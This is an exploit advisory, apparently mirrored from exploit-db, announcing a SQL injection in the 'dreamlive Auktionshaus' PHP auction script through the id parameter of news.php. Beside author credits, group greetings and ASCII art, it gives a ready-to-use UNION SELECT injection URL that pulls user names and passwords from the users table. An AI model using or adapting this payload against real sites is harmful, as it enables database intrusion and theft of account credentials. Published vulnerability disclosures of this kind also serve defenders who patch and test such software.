dreamlive Auktionshaus script – ‘news.php?id’ SQL Injection

  • 作者: Easy Laster
    日期: 2010-03-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11704/
  • ----------------------------Information------------------------------------------------
    +Name : dreamlive Auktionshaus script news.php (id) SQL Injection
    +Autor : Easy Laster
    +Date : 12.03.2010
    +Script: dreamlive Auktionshaus script 
    +Language :PHP
    +Discovered by Easy Laster
    +Security Group 4004-Security-Project
    +Greetz to Team-Internet ,Underground Agents
    +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
    Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
    N00bor,Damian,novaca!ne.
    
    ---------------------------------------------------------------------------------------
     
     ___ ___ ___ ___ _ _ _____ _ _ 
    | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ 
    |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|
    |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_|
    |___| |___|
    
    
    ----------------------------------------------------------------------------------------
    +Vulnerability : http://server/auktionshaus/news.php?id=
    +Exploitable : http://server/auktionshaus/news.php?id=999999+union+select+1,2,
    concat(name,0x3a,password),4,5+from+users+where+id=1--
    -----------------------------------------------------------------------------------------